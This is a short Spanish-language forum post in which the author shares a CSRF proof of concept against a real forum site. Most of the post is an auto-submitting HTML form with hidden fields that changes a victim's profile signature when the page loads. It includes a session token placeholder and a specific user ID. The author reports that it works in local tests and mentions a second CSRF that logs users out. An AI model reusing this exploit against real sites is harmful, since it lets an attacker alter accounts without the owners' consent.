xD
Jejej xD.
Lee de nuevo mi comentario, lo edite... Lo consigo de otra forma.
Aunque ya encontré un CSRF, que seria para cerrar sesion jajaja xD
Yo el formulario que he hecho es este:
<html>
<head>
<title>Hacking elhacker.net</title>
</head>
<body>
<form action="http://foro.elhacker.net/profile2.html" method="post" accept-charset="ISO-8859-1" name="creator" id="creator" enctype="multipart/form-data">
<input type="hidden" name="signature" value="añlskdfñqwiejfñalksjndvpiqouwenfhñqwjkef">
<input type="hidden" name="sa" value="forumProfile">
<input type="hidden" name="sc" value="tu cookie"/>
<input type="hidden" name="userID" value="334657"/>
<script type="text/javascript">document.creator.submit();</script>
</form>
</body>
</html>
Si le pongo mi sc y el id del user la firma cambia.
Lo ejecuto desde el pc mismo desconozco si colgado en algun hosting funcionara pero diria mucho que si ya que si funciona abriendolo local.
Seguramente me paso algo por alto ~ Yoya ~ pero en las pruebas que realice funcionaba.